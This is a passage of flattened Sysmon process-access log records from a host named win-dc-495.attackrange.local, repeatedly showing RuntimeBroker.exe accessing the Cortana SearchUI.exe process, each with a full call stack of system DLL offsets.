13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405544C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405544C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405660C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405660C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405268C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405936C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}4540808C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405268C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}4540808C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405944C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405944C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405660C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405660C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405980C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405980C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\W